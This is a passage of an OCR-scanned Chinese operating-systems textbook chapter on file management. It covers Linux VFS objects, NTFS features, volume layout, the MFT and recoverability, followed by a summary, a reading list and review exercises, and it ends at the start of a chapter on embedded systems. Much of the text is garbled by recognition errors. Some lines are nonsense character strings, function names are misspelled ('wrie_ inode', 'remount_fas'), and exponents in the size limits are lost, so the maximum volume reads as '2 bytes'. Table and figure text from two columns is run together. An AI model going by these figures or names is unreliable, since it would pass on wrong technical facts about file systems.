四 个 对 象 如 下 : 

© 超级 块 对 象 : 代表 一 个 特定 的 已 挂 接 的 文件 系统 。 

“@ 索引 节点 对 象 : 代表 一 个 特定 的 文件 。 

@ 目录 对 象 : 代表 一 个 特定 的 目录 项 。 

@ 文件 对 象 : 代表 一 个 与 进程 相关 的 打开 的 文件 。 
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这 个 方案 是 基于 UNIX 文件 系统 中 所 使 用 的 概念 的 ( 见 12.7 节 )。UNIX 文件 系统 的 关键 概 
念 如 下 。 一 个 文件 系统 由 层次 目录 组 成 。 目 录 的 概念 和 许多 非 UNIX 平台 中 的 文件 夹 是 一 样 的 ， 
可 以 包含 文件 和 其 他 目录 。 由 于 一 个 目录 可 能 包含 其 他 目录 , 因此 就 形成 了 一 个 树 结构 。 在 树 结 
构 中 从 根 开始 的 路 径 由 一 系列 目录 项 组 成 , 最 后 以 目录 项 或 文件 名 结束 。 在 UNIX 中 , 目录 是 用 
一 个 列 出 了 该 目录 所 包含 的 文件 名 和 目录 的 文件 来 实现 的 。 因 此 , 文件 操作 能 同时 应 用 于 文件 或 
目录 。 


12.9.1 超级 块 对 象 


超级 块 存储 了 描述 特定 文件 系统 的 信息 。 通 常 , 超级 块 对 象 对 应 了 位 于 磁盘 上 特定 扇 区 的 文 
件 系统 超级 块 或 文件 系统 控制 块 。 
超级 块 对 象 由 许多 数据 项 组 成 ， 如 下 所 示 : 
@ 该 文件 系统 所 挂 接 的 设备 。 
文件 系统 的 基本 块 大 小 。 
脏 标 志 ， 表 示 超 级 块 已 经 修改 过 ， 但 还 没有 写 回 到 磁盘 。 
文件 系统 类 型 。 
标志 ， 如 只 读 标志 。 
指向 文件 系统 根 目 录 的 指针 。 
打开 文件 列表 。 
控制 访问 该 文件 系统 的 信号 量 。 
@ 操作 超级 块 的 函数 指针 数组 的 指针 。 
上 面 列 出 的 最 后 一 项 是 一 个 包含 在 超级 块 对 象 中 的 操作 对 象 。 该 操作 对 象 定义 了 内 核 可 在 超 
级 块 对 象 上 调用 的 对 象 方法 〈 函数 )。 为 超级 块 对 象 定 义 的 方法 包括 : 
@ read_inode: 从 一 个 已 挂 接 的 文件 系统 上 读 一 个 特定 的 索引 节点 。 
wrie_ inode: 把 给 定 的 索引 节点 写 回 到 磁盘 。 
put_inode: 释放 索引 节点 。 
delete inode: 从 磁盘 上 删除 索引 节点 。 
notify inode: 当 索 引 节点 的 属性 发 生变 化 时 调用 。 
put_super: 当 VFS 外 载 一 个 给 定 的 超级 块 时 调用 。 
write super: 当 VFS 决定 把 超级 块 写 回 到 磁盘 时 调用 。 
statis: 获取 文件 系统 的 统计 信息 。 
remount_fas: 当 文件 系统 重新 挂 接 时 调用 。 
clear_inode: 释放 索引 节点 ， 同 时 清除 任何 包含 相关 数据 的 页 。 


12.9.2 索引 节点 对 象 


一 个 索引 节点 与 一 个 文件 相关 联 。 索 引 节点 对 象 包含 一 个 命名 文件 的 除了 该 文件 的 文件 名 
和 该 文件 的 实际 数据 内 容 外 的 所 有 信息 。 索引 节点 中 包含 由 所 有 者 、 组 、 权 限 、 文 件 的 访问 时 间 、 
数据 长 度 和 链接 数 等 信息 。 

索引 节点 对 象 包含 一 个 描述 VFS 能 在 该 索引 节点 上 调用 的 文件 系统 的 实现 函数 的 索引 节点 
操作 对 象 。 索 引 节 点 操作 对 象 中 定义 了 如 下 的 函数 : 

© create: 为 与 某 一 目录 下 的 目录 项 对 象 相 关联 的 普通 文件 创建 一 个 新 的 索引 节点 。 

@ lookup: 为 对 应 于 一 个 文件 名 的 索引 节点 查找 一 个 目录 。 

@ mkdir: 为 与 某 一 目录 下 的 目录 项 对 象 相 关联 的 目录 创建 一 个 新 的 索引 节点 。 
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12.9.3 目录 项 对 象 


目录 项 (directory entry，dentry ) 对 象 是 一 个 路 径 上 的 一 个 特定 的 组 成 。 该 组 成 或 者 是 一 个 
目录 名 或 文件 名 。 目录 对 象 为 访问 文件 和 目录 提供 了 方便 。 目录 项 对 象 包括 一 个 指向 索引 节点 的 
指针 和 超级 块 。 它 还 包括 一 个 指向 父 目录 的 指针 和 指向 子 目录 的 指针 。 


12.9.4 文件 对 象 


文件 对 象 代表 一 个 进程 所 打开 的 一 个 文件 。 文 件 对 象 在 系统 调用 open() 时 创建 , 在 系统 调用 
close(0 时 销 筑 。 文 件 对 象 包含 如 下 一 些 数据 项 : 
与 该 文件 相关 联 的 目录 对 象 。 
包含 该 文件 的 文件 系统 。 
文件 对 象 使 用 计数 。 
用 户 ID。 
用 户 组 ID。 
@ 文件 指针 ， 指 向 下 一 个 文件 操作 所 要 作用 到 的 位 置 。 
文件 对 象 包 含 一 个 描述 VES 能 在 该 文件 对 象 上 调用 的 文件 系统 的 实现 函数 的 文件 操作 对 
象 。 该 对 象 包含 的 函数 有 read, write, open, release 和 lock. 


12.10 Windows 文件 系统 


Windows 的 开发 者 还 设计 了 一 个 新 的 文件 系统 一 一 NTFS， 用 于 满足 工作 站 和 服务 器 中 的 高 
级 要 求 。 高 级 应 用 程序 的 例子 有 : 

@ 客户 /服务 器 应 用 程序 ， 如 文件 服务 器 、 计 算 服 务 器 和 数据 库 服务 器 。 

@ 资源 密集 型 工程 和 科学 应 用 。 

@ 大 型 系统 的 网 络 应 用 程序 。 

本 节 将 简单 介绍 NTFS. 


12.10.1 NTFS 的 重要 特征 


NTFS 是 一 种 非常 灵活 且 功 能 强大 的 文件 系统 , 它 建立 在 一 个 简洁 的 文件 系统 模型 上 。NTFS 
的 显著 特征 有 : 

@ 可 恢复 性 : 之 所 以 需要 建立 新 Windows 文件 系统 ， 就 是 为 了 具备 从 系统 崩溃 和 磁盘 故障 
中 恢复 数据 的 能 力 。 当 发 生 这 类 故障 时 ，NTFS 能 够 重建 文件 卷 ， 并 使 它们 返回 到 一 个 
一 致 的 状态 。 它 是 通过 为 文件 系统 的 变化 使 用 一 个 事务 处 理 模型 来 实现 这 一 点 的 。 文 件 
系统 的 每 个 重要 的 变化 都 被 看 做 是 一 个 原子 动作 ， 或 者 完全 执行 ， 或 者 根本 就 不 执行 。 
当 发 生 故 障 时 ， 每 个 正在 处 理 的 事务 随后 或 者 取消 ， 或 者 完成 。 此 外 ，NTFS 对 重要 的 
文件 系统 数据 进行 元 余 存储 ， 这 样 ， 一 个 磁盘 扇 区 的 故障 不 会 导致 描述 文件 系统 结构 和 
状态 的 数据 丢失 。 

© 安全 性 : NTFS 使 用 Windows 对 象 模 型 来 实施 安全 机 制 。 一 个 打开 的 文件 作为 一 个 文件 
对 象 来 实现 ， 并 且 有 一 个 定义 它 的 安全 属性 的 安全 描述 符 。 安 全 描述 符 作为 文件 的 一 个 
属性 被 保存 在 磁盘 上 。 

多 大 磁盘 和 大 文件 : NTFS 比 包 括 FAT 在 内 的 其 他 大 多 数 文件 系统 能 够 更 有 效 地 支持 非常 
大 的 磁盘 和 非常 大 的 文件 。 

全 多 数据 流 : 文件 的 实际 内 容 被 当做 字 节 流 处 理 。 在 NTFS 中 可 以 为 一 个 文件 定义 多 个 数 
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据 流 ， 关 于 这 个 特征 的 一 个 应 用 例子 是 允许 多 个 远程 Macintosh 系统 使 用 NTFS 来 保存 
和 检索 文件 。 在 Macintosh 中 ， 每 个 文件 由 两 部 分 组 成 : 文件 数据 和 包含 有 关 文 件 信息 
的 派生 资源 。NTFS 把 这 两 部 分 当做 两 个 数据 流 。 

@ AS: NTFS 维护 了 一 个 记录 所 有 对 于 卷 上 的 文件 进行 的 修改 的 日 志 。 程 序 ， 比 如 桌面 


查找 ， 可 以 读 取 这 个 日 志 来 辨别 哪些 文件 已 经 被 修改 了 。 
@ 压缩 和 加 密 : 整个 目录 和 单个 文件 均 可 以 被 透明 地 压缩 或 加 密 。 


Windows/Linux 的 对 比 





Windows 

Windows 支持 多 种 文件 系统 包括 从 DOS/Windows itt 
留 的 FAT/FAT32 文件 系统 以 及 常见 的 CD 和 DVD 

Windows 中 使 用 的 最 通用 的 文件 系统 是 NTFS, 这 种 
文件 系统 拥有 很 多 与 安全 性 、 加 密 、 压 缩 、 日 志 、 变 更 
通知 和 内 部 索引 相关 的 高 级 特性 

NTFS 使 用 元 数据 的 记录 来 避免 系统 崩 演 后 不 得 不 进 
行 的 文件 系统 检查 

Windows 文件 系统 是 作为 设备 驱动 来 实现 的 ,并 且 当 
和 其 他 设备 驱动 一 起 时 能 够 分 层 堆 准 起 来 I F 
向 对 象 的 Windows IO 出 实现 。 典 型 的 NTFS 夹 在 第 三 
方 的 过 滤器 驱动 程序 之 间 ,过 滤器 驱动 程序 可 以 实现 例 
如 防 病毒 和 实现 了 RAID 的 卷 管理 驱动 等 功能 

文件 系统 很 大 程度 上 依赖 于 VO 系统 和 高 速 缓存 管 
理 器 。 高 速 缓 存 管理 器 是 一 个 映射 文件 区 域 到 内 核 虚 拟 
地 址 空间 的 虚拟 文件 缓存 

高 速 绥 存 管理 器 在 虚拟 存储 系统 的 上 层 被 实现 ,同时 
为 页 和 文件 块 提供 了 一 个 统一 的 缓存 机 制 


目录 、 位 图 、 文 件 和 文件 系统 元 数据 都 被 NTFS 表现 
为 文件 的 形式 ,因此 都 依赖 高 速 缓存 管理 器 的 统一 的 组 
存 管理 “ 


磁盘 数据 的 预先 载 人 使 用 复杂 的 算法 ,这 种 算法 能 够 
记 住 所 经 历 的 应 用 程序 和 数据 的 访问 方式 ,并 且 当 应 用 
程序 开始 运行 、 移 动 到 前 台 或 者 从 系统 休眠 中 恢复 时 初 
始 化 异步 的 页 面 缺 陷 操作 


12.10.2 NTFS 卷 和 文件 结构 
NTFS 使 用 下 列 磁盘 存储 概念 : 





Linux 


Linux 支持 多 种 文件 系统 , 为 了 兼容 性 和 互 操作 性 , 包括 
微软 的 文件 系统 


最 通用 的 文件 系统 是 Extz2 Ext3 和 IBM 的 JFS 日志 
件 系统 


在 Ext3 中 ,变更 日 志 避 免 了 系统 崩溃 后 的 文件 系统 检查 


Linux 文件 系统 是 使 用 Sun Microsystem 公司 的 虚拟 文件 
系统 技术 来 实现 的 。 在 VFS 模型 中 ,文件 系统 是 一 种 插件 
HJY. VFS 模型 和 通常 的 面相 对 象 模型 类 似 


Linux 使 用 页 面 高 速 缓存 ,保存 内 存 中 最 近 使 用 的 页 的 副 
本 。 页 根据 所 有 者 来 组 织 : 通常 情况 下 是 文件 和 目录 的 索 
引 节 点 或 者 作为 文件 系统 元 数据 的 块 设备 的 索引 节点 

Linux 的 虚拟 存储 系统 在 页 面 高 速 缓存 设备 的 顶层 建立 
起 文件 的 存储 器 映射 

VES 的 通用 文件 系统 模型 把 目录 实体 和 文件 节点 及 其 他 
文件 系统 元 数据 〈 如 超级 块 ) 从 文件 数据 中 分 离开 来 ， 对 
每 个 类 别 用 专门 的 高 速 缓存 管理 。 文 件数 据 能 够 被 存储 进 
缓存 两 次 ， 一 次 为 了 文件 所 有 者 ， 一 次 为 了 块 设备 所 有 者 


磁盘 数据 的 预先 载 人 采用 对 顺序 存 取 文 件 的 预 读 方 式 


e BK (sector): 磁盘 中 最 小 的 物理 存储 单元 。 一 个 扇 区 中 能 存储 的 数据 量 字 节 数 总 是 2 
HE, FF AGRA 512 个 字 节 。 

@ & (cluster): 一 个 或 多 个 连续 的 扇 区 (在 同一 磁道 上 
目 也 为 2 WE. 

e 卷 (volume): 磁盘 上 的 逻辑 分 区 。 由 一 个 或 多 个 艇 组 成 ， 供 文件 系统 分 配 空间 时 使 用 。 
在 任何 时 候 ， 一 个 卷 包括 文件 系统 信息 、 一 组 文件 以 及 卷 中 剩余 的 可 以 分 配给 文件 的 未 
分 配 空间 。 一 个 卷 可 以 是 整个 磁盘 ， 也 可 以 是 一 部 分 磁盘 ， 还 可 以 跨越 多 个 磁盘 。 如 果 
采用 了 硬件 或 软件 RAID S， 则 一 个 卷 由 跨越 多 个 磁盘 的 条 带 组 成 。NTFS 中 一 卷 最 大 为 
2 个 字 节 。 


个 接 一 个 )。 一 个 簇 中 扁 区 的 数 
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NTIFS##AHRWRER, RARRAHDRA. PM, PRET RRA 512 FP, HAR 
9675 ERC (1 簇 =1KB )。 如 果 一 个 用 户 创建 了 一 个 1600 个 字 节 的 文件 ， 则 给 该 
文件 分 配 2 秒 。 如 果 用 户 后 来 又 把 文件 修改 成 3200 个 字 节 ， 则 再 分 配 另 外 2 和 化。 分 配给 一 个 文 
件 的 笛 不 需要 一 定 是 连续 的 ， 即 允许 一 个 文件 在 磁盘 上 被 分 成 几 段 。 当 前 ，NTFS 支持 的 最 大 文 
件 为 22 个 簇 ， 等 于 23 个 字 节 。 一 个 艇 讨 多 有 2* 个 字 节 。 

使 用 簇 进行 分 配 使 得 NTFS 不 依赖 于 物理 扇 区 的 大 小 。 这 使 得 NTFS 能 够 很 容易 地 支持 扇 区 
大 小 不 是 512 个 字 节 的 非 标准 磁盘 ,并且 能 够 通过 使 用 比较 大 的 叉 有 效 地 支持 非常 大 的 磁盘 和 非 
常 大 的 文件 。 这 是 因为 文件 系统 必须 迫 踪 分 配给 每 个 文件 的 每 一 簇 , 而 对 于 比较 大 的 艇 , 需要 处 
理 的 项 很 少 。 

# 12.5 给 出 了 NTFS 默认 的 艇 大小。 默认 值 取 决 于 卷 的 大 小 。 当 用 户 要 求 对 某 个 卷 进行 格 
Skat, PAF RBM RANE H NTFS 确立 的 。 
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% 大 小 SRM MM E A 
512 MB 1 512 字 节 
512 MB~1 GB 2 1KB 
1 GB~2 GB 4 2KB 
2 GB~4 GB 8 4KB 
4 GB~8 GB 16 8KB 
8 GB~16 GB 32 , 16KB 
16 GB~32 GB 64 32KB 
>32 GB 128 64KB 

NTFS 卷 布局 


NTFS 使 用 一 种 非常 简单 但 是 功能 非常 强大 的 方法 组 织 磁盘 卷 中 的 信息 。 卷 中 的 每 个 元 素 都 
是 一 个 文件 , 并 且 每 个 文件 包含 一 组 属性 ， 文件 的 数据 的 等 也 看 做 是 一 个 属性 。 通过 这 种 简单 的 
结构 ， 组 织 和 管理 文件 系统 只 需要 一 些 通 用 的 功能 。 

图 12.19 显示 了 一 个 NTFS 卷 的 布局 ， 它 由 4 个 区 域 组 成 。 在 任何 卷 中 ,开始 的 一 些 扇 区 被 
分 区 引导 扇 区 (partition boot sector) 占据 ( 尽管 它 被 称 做 一 个 扇 区 ， 但 它 可 能 有 16 个 扇 区 那么 
长 )， 分 区 引导 扇 区 包含 卷 的 布局 信息 、 文 件 系统 的 结构 以 及 引导 启动 信息 和 代码 。 接 下 来 是 主 
文件 表 ( Master File Table，MFT )， 主 文件 表 包 含 关于 在 这 个 NTFS 卷 中 所 有 文件 和 文件 夹 ( 目 
F) 的 信息 以 及 关于 可 用 的 未 分 配 空 间 的 信息 。 事 实 上 ，MFT 是 这 个 NTFS 卷 中 所 有 内 容 的 列 
表 ， 被 组 织 成 关系 数据 库 结 构 中 的 许多 行 。 





图 12.19 NTFS 卷 布局 


T 后 面 的 区 域 包含 系 统 文件 (system file )， 长 度 大 约 为 IMB。 这 个 区 域 中 的 文件 有 : 
© MFT2: 关于 MFT 前 三 行 的 镜像 ， 用 于 保证 在 一 个 肩 区 失败 的 情况 下 仍 可 以 访问 MFT。 
@ 日 志文 件 : 事务 处 理 步骤 列表 ， 用 于 NTFS 的 恢复 。 
© RMR: 关于 卷 的 一 种 表示 ， 说 明 哪 一 能 正在 被 使 用 。 
o 属性 定义 表 : 定义 该 卷 所 支持 的 属性 类 型 ， 指 明 它们 是 否 可 以 被 索引 以 及 在 系统 恢复 操 
作 中 它们 是 否 可 以 恢复 。 
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EXER s l 
MFT 是 Windows 文件 系统 的 核心 。MET 被 组 织 成 一 个 行 可 变 长 度 的 表 ， 行 称 做 记录 。 每 一 
行 描述 了 该 卷 中 的 一 个 文件 或 文件 夹 ， 包 括 MFT AS, MFT 也 被 看 做 是 一 个 文件 。 如 果 文 件 的 
内 容 足 够 小 ， 则 整个 文件 位 于 MFT 的 一 行 中 。 否 则 ， 这 人 一行 包含 文件 中 的 一 部 分 信息 ， 其 余 溢 
出 的 部 分 放 到 这 个 卷 中 别 的 可 用 簇 中 ， 指 向 这 些 簇 的 指针 保存 在 MFT 中 对 应 于 该 文件 的 行 中 。 
MFT 中 的 每 个 记录 都 包含 一 组 属性 ， 用 于 定义 文件 ( 或 文件 夹 ) 的 特性 和 文件 的 内 容 。 表 
12.6 列 出 了 一 行 中 可 能 包含 的 属性 ， 阴 影 部 分 表示 必须 有 的 属性 。 


表 12.6 Windows NTFS 文件 和 目录 属性 类 型 








属性 类 型 说 RA 

标准 信息 ee y 

属性 表 组 成 文件 的 属性 列表 ， 以 及 放置 每 个 属性 的 MFT 文件 记录 的 文件 引用 当 所 有 属性 都 不 适合 
ee -个 MFT 文件 记录 时 使 用 

文件 各 < .个 文件 或 目录 A wis re 

安全 描述 符 

数据 4 的 内 容 。 一 个 

索引 根 用 于 实现 文件 夹 

索引 分 配 用 于 实现 文件 夹 

卷 信息 包括 与 着 相关 的 信息 ， 如 版 本 信息 和 卷 的 名 字 

位 图 提供 在 MFT 或 文件 夹 中 正在 使 用 的 记录 的 映像 


注 ; 有 阴影 的 行 表 示 必 须 有 的 文件 属性 ， 其 他 属性 是 可 选 的 。 
12.10.3 ”可 恢复 性 


NTFS 可 以 在 系统 崩溃 或 磁盘 失效 后 ， 把 文件 系统 恢复 到 一 致 的 状态 。 支 持 可 恢复 性 的 重要 
组 件 如 下 所 示 ( 见 图 12.20): 
o |O 管理 程序 : 包括 NTFS 驱动 程序 , 用 于 处 理 NTFS 中 基本 的 打开 、 Pons 读 、 写 功能 。 
此 外 ， 可 以 对 软件 RAID 模块 FTDISK 进行 配置 。 
@ 日 志文 件 服务 : 维护 一 个 关于 磁盘 上 文件 系统 元 数据 的 改变 的 日 志 。 这 个 日志 文件 用 于 在 系 
统 失败 时 恢复 一 个 NTFS 格式 的 卷 。( 例如 ， 在 没有 强制 运行 文件 系统 检查 功能 的 情况 下 )。 
© 高 速 缓存 管理 器 : 负责 对 文件 的 读 写 进行 高 速 缓存 以 提高 性 能 。 高 速 缓存 管理 程序 优化 
磁盘 VO, 
o 虚 存 管理 程序 NTFS 通过 把 对 文件 引用 映射 到 虑 存 引用 以 及 读 写 虚 存 ， 来 访问 被 级 丰 
的 文件 。 
值得 注意 的 是 ， NTES 使 用 的 恢复 过 程 是 为 恢复 文件 系统 的 数据 而 设计 的 ， 不 是 用 于 恢复 文 
件 的 内 容 。 因 此 ， 用 户 永远 不 会 因为 系统 崩溃 而 丢失 应 用 程序 的 卷 或 目录 /文件 结构 ， 但 是 ， 文 
件 系统 并 不 能 保证 用 户 数据 不 会 丢失 。 要 提供 完全 的 包括 恢复 用 户 数据 的 恢复 能 力 , 需要 更 精细 
并 更 消耗 资源 的 恢复 机 制 。 
NTFS 恢复 能 力 的 实质 是 记录 法 。 每 个 改变 文件 系统 的 操作 被 当做 一 个 事务 处 理 。 改 变 重 要 
的 文件 系统 数据 结构 的 事务 的 每 个 子 操 作 在 被 记录 到 磁盘 卷 之 前 首先 记录 在 日 志文 件 中 。 使 用 这 
个 日 志 ， 一 个 在 系统 崩溃 时 完成 了 一 一 部 分 的 训 务 可 以 在 以 后 系统 恢复 时 重 做 或 者 撤销 。 
一 般 来 说 ， 为 保证 可 恢复 性 ， 需 要 以 下 4 个 步 又 [ RUSSOS ): 
1) NTFS 首先 调用 日 志文 件 系统 ， EREE P ERIH RER AROHANA. 
2) NTFS 修改 这 个 卷 ( 在 高 速 缓存 中 )。 
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3) 高 速 缓存 管理 器 调用 日 志文 件 系 统 ， 提 示 它 刷新 磁盘 中 的 日 志文 件 。 
4) 如 果 日 志文 件 在 磁盘 上 的 更 新 是 安全 的 ， 高 速 缓存 管理 器 把 该 卷 的 变化 刷新 到 磁盘 中 。 


日 志文 件 TINTES 驱动 程序 


文件 容错 驱动 程序 | 











读 / 写 一 个 被 镜像 
或 条 带 化 的 卷 





刷新 日 志 
文件 FARA 


4 


高 速 缓存 
把 数据 从 磁盘 


访问 映射 文件 或 
刷新 高 速 缓存 





12.20 Windows NTFS 部 件 


12.11 小 结 


文件 管理 系统 是 一 组 系统 软件 , 为 使 用 文件 的 用 户 和 应 用 程序 提供 服务 , 包括 文件 访问 、 目 
录 维 护 和 访问 控制 。 文 件 管理 系统 通常 被 看 做 是 一 个 由 操作 系统 提供 服务 的 系统 服务 , 而 不 是 操 
作 系 统 的 一 部 分 。 但 是 ， 在 任何 系统 中 ， 至 少 有 一 部 分 文件 管理 功能 是 由 操作 系统 执行 的 。 

一 个 文件 由 一 组 记录 组 成 。 访 问 这 些 记录 的 方式 决定 了 文件 的 逻辑 组 织 , 并 在 某 种 程度 上 决 
定 了 它 在 磁盘 上 的 物理 组 织 。 如 果 一 个 文件 主要 是 作为 一 个 整体 处 理 , 那么 顺序 文件 组 织 是 最 简 
单 、 最 适合 的 。 如 果 需 要 对 单个 文件 的 顺序 访问 同时 也 进行 随机 访问 , 索引 顺序 文件 可 以 产生 最 
佳 的 性 能 ; 如 果 对 文件 的 访问 主要 是 随机 访问 ， 索 引文 件 或 散 列 文件 可 能 是 最 适合 的 。 

不 论 选 择 哪 种 文件 结构 ,都 需要 一 种 目录 服务 , 这 就 使 得 文件 可 以 按 层次 方式 组 织 。 这 种 组 
织 有 助 于 用 户 了 解 文件 ,同时 也 有 助 于 文件 管理 系统 给 用 户 提供 访问 控制 和 其 他 服务 ,文件 记录 ， 
即使 是 固定 大 小 的 ， 通 常 也 与 一 个 物理 磁盘 块 的 大 小 不 一 致 。 因 此 ， 需 要 某 种 类 型 的 组 块 策略 。 
在 复杂 性 、 性 能 和 空间 利用 率 之 间 的 权衡 决定 了 要 使 用 的 组 块 策 略 。 

任何 文件 管理 方案 的 一 个 重要 功能 是 管理 磁盘 空间 ,其 中 部 分 功能 是 给 一 个 文件 分 配 磁盘 块 
的 策略 。 可 以 采用 各 种 各 样 的 方法 , 使 用 各 种 各 样 的 数据 结构 来 跟踪 对 每 个 文件 的 分 配 情况 。 此 
Sh, 磁盘 中 的 未 分 配 的 空间 也 必须 管理 起 来 , 这 部 分 功能 主要 包括 维护 一 个 磁盘 分 配 表 , 磁盘 分 
配 表 指明 了 哪些 块 是 空闲 的 。 


12.12 推荐 读物 


关于 文件 管理 有 许多 优秀 的 书籍 。 下 面 的 所 有 文献 都 着 重 论述 文件 管理 系统 ， 同 时 也 解决 了 相关 的 操 
作 系 统 问题 。 最 有 用 的 可 能 是 [ WIED87 ]， 它 给 出 了 文件 管理 的 大 量 方法 ， 并 论述 了 图 12.2 中 从 磁盘 调度 
到 文件 结构 的 所 有 问题 。[ LIVA90 ] 重点 讲述 文件 结构 ， 并 给 出 了 关于 性 能 分 析 与 比较 的 一 个 很 好 的 长 篇 
综述 。[ GROS86 ] 讲述 了 与 文件 VO 和 文件 访问 方法 相关 的 问题 , 还 描述 了 文件 系统 所 需 的 所 有 控制 结构 ， 
为 评估 文件 系统 的 设计 提供 了 一 个 非常 有 用 的 检验 表 。[ FOLK98 ] 的 重点 内 容 是 文 忻 的 处 理 ， 讲 述 了 诸如 
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维护 、 查 找 、 排 序 、 共 享 之 类 的 问题 。 


关于 Linux 文件 系统 的 细节 ， 请 参阅 [LOVE05] 和 {BOVE03]。 较 好 的 人 门 教材 是 [RUBI97]。 
[ CUST94 ] 给 出 了 关于 Windows NT 文件 系统 的 一 个 很 好 的 综述 。[ NAGA97 ] 更 详细 地 讲述 了 这 方面 的 


问题 。 
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1213 关键 术语 、 复 习题 和 习题 

关键 术语 
访问 方法 域 文件 名 关键 域 
位 表 文件 散 列 文件 路 径 名 
块 文件 分 配 索引 文件 管道 
链接 文件 分 配 文件 分 配 表 索引 文件 分 配 记录 
连续 文件 分 配 文件 目录 索引 顺序 文件 顺序 文件 
数据 库 文件 管理 系统 索引 节点 工作 目录 
磁盘 分 配 表 

复习 题 

12.1 域 和 记录 有 什么 不 同 ? 

12.2 ”文件 和 数据 库 有 什么 不 同 ? 

12.3 ”什么 是 文件 管理 系统 ? 

12.4 选择 文件 组 织 时 的 重要 原则 是 什么 ? 

12.5 列 出 并 简单 定义 五 种 文件 组 织 。 

12.6 ”为 什么 在 索引 顺序 文件 中 查找 一 个 记录 的 平均 查找 时 间 小 于 在 顺序 文件 中 的 平均 查找 时 间 ? 

12.7 对 目录 执行 的 典型 操作 有 哪些? 

12.8 ”路 径 名 和 工作 目录 有 什么 关系 ? 

12.9 ”可 以 授予 或 拒绝 的 某 个 特定 用 户 对 某 个 特定 文件 的 访问 权限 通常 有 哪些 ? 


12.10 列 出 并 简单 定义 三 种 组 块 方法 。 
12.11 列 出 并 简单 定义 三 种 文件 分 配方 法 。 


习题 

12.1 定义 : 
B=RK) 
R= 记录 大 小 
P= 块 指 针 大 小 


F= 组 块 因 子 ， 即 一 个 块 中 期 望 的 记录 数 
对 图 12.6 中 描述 的 三 种 组 块 方法 分 别 给 出 关于 已 的 公式 。 
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12.2 


12.3 


12.10 


一 种 避免 预 分 配 中 的 浪费 和 缺乏 邻近 性 问题 的 方案 是 . 分 配 区 的 大 小 随 着 文件 的 增长 而 增加 。 例 如 ， 

开始 时 ， 分 区 的 大 小 为 一 块 ， 在 以 后 每 次 分 配 时 ， 分 区 的 大 小 翻 倍 。 考 虑 一 个 有 n 条 记录 的 文件 ， 

组 块 因子 为 Ff， 假 设 一 个 简单 的 一 级 索引 用 做 一 个 文件 分 配 表 。 

a) 给 出 文件 分 配 表 中 人 口 数 的 上 限 ( 用 关于 下 入 的 函数 表示 )。 

b) 在 任何 时 候 ， 已 分 配 的 文件 空间 中 未 被 使 用 的 空间 的 最 大 量 是 多 少 ? 

当 数据 

a) 很 少 修改 并 且 以 随机 顺序 频繁 地 访问 时 ; 

b) 频繁 地 修改 并 且 相 对 频繁 地 访问 文件 整体 时 ; 

c) 频繁 地 修改 并 以 随机 顺序 频繁 地 访问 时 ; 

从 访问 速度 、 存 储 空间 的 使 用 和 易于 更 新 ( 添加 /删除 /修改 ) 这 几 方 面 考 虑 , 为 了 达到 最 大 效率 ,你 

将 选择 哪 种 文件 组 织 ? 

忽略 目录 和 文件 描述 符 的 开销 ， 考 虑 一 个 文件 系统 ， 其 中 文件 被 存储 在 大 小 为 8K 的 块 中 。 对 于 下 列 

各 种 文件 大 小 , 计算 文件 的 最 后 一 块 对 空间 浪费 的 百分比 : 3 209 字 节 ; 24 576 字 节 ; 2 328 432 002 字 节 。 

假设 一 个 UNIX 系统 已 经 在 /path 路 径 下 挂 载 了 一 个 文件 系统 ,那么 一 个 应 用 程序 为 了 读 取 /path/to/file 

的 第 一 个 字 节 ， 必 须 额外 访问 多 少 磁盘 块 ? 

目录 可 以 当做 一 种 只 能 通过 受 限 方式 访问 的 “特殊 文件 ”实现 ， 也 可 以 当做 普通 文件 实现 。 这 两 种 

方法 分 别 有 哪 些 优点 和 缺点 ? 

一 些 操作 系统 具有 一 个 树 结构 的 文件 系统 ,但 是 把 树 的 深度 限制 到 某 个 比较 小 的 级 数 上 。 这 种 限制 

对 用 户 有 什么 影响 ” 它 是 如 何 简化 文件 系统 的 设计 的 (如果 能 简化 ) ? 

考虑 一 个 层次 文件 系统 ， 空 闲 的 磁盘 空间 保留 在 一 个 空闲 空间 表 中 。 

a) 假设 指向 空闲 空间 的 指针 委 失 了 。 该 系统 可 以 重新 要 空闲 空间 表 吗 ? 

b) 给 出 一 种 方案 ,确保 即使 出 现 了 -- 次 存储 器 失败 ， 指 针 也 不 会 丢失 。 

一 个 文件 系统 有 2KB 个 磁盘 块 ， 它 可 以 通过 索引 节点 三 级 索引 结构 访问 到 32GB 大 小 的 数据 。 试 问 

该 文件 系统 需要 用 多 少 位 作为 块 指针 ? 

考虑 由 一 个 索引 节点 表示 的 UNIX 文件 的 组 织 (OLA 12.14), RRA 12 个 直接 块 指针 ， 在 每 个 索引 

节点 中 有 一 个 一 级 、 二 级 和 三 级 间接 指针 。 此 外 ,假设 系统 块 大 小 和 磁极 扁 区 大 小 都 是 8K. MRR 

MIRAE 32 位 ， 其 中 8 位 用 于 标识 物理 磁盘 ，24 位 用 于 标识 物理 块 ， 那 么 

a) 该 系统 支持 的 最 大 文件 大 小 是 多 少 ? 

b ) 该 系统 支持 的 最 大 文件 系统 分 区 是 多 少 ? 

c) 假设 内 存 中 除了 文件 索引 节点 外 没有 别 的 信息 ， 访 问 在 位 置 13 423 956 中 的 字 节 需要 多 少 次 磁 
盘 访 问 ? 





相 比 部 署 在 嵌入 式 系统 中 操作 系统 的 数量 ,部 署 在 个 人 计算 机 和 桌面 计算 机 中 的 操作 系统 的 
数量 就 相形 见 织 了 。 按 这 种 方式 衡量 , 嵌入 式 操作 系统 构成 了 操作 系统 中 最 重要 的 一 类 。 谋 入 式 
操作 系统 有 它们 自己 独特 的 需求 和 设计 重点 ， 本 部 分 将 研究 这 些 内 容 。 


第 六 部 分 导读 


第 13 章 BARRERA 


第 13 章 首 先 介 绍 了 嵌入 式 系统 ， 接 着 审视 嵌入 式 操作 系统 的 关键 特性 。 然 后 通过 两 种 广泛 
使 用 的 系统 eCos 和 TinyOS， 来 介绍 两 种 非常 不 同 的 嵌入 式 操作 系统 设计 方法 。 


第 13 E RARER 


本 章 我 们 分 析 一 种 广泛 使 用 的 最 重要 的 操作 系统 : KARRERA. 嵌入 式 系统 的 配置 环境 
独特 性 、 对 操作 系统 的 要 求 苛刻 和 对 设计 策略 的 要 求 都 和 构建 普通 的 操作 系统 大 大 不 同 。 

我 们 以 嵌入 式 系统 的 概念 总 览 开始 ， 然 后 转 而 探讨 嵌 人 式 操作 系统 的 原理 。 最 后 , 本 章 介 绍 
两 种 很 截然 不 同 的 僚 人 式 系统 的 设计 方法 。 


13.1 RAMA 


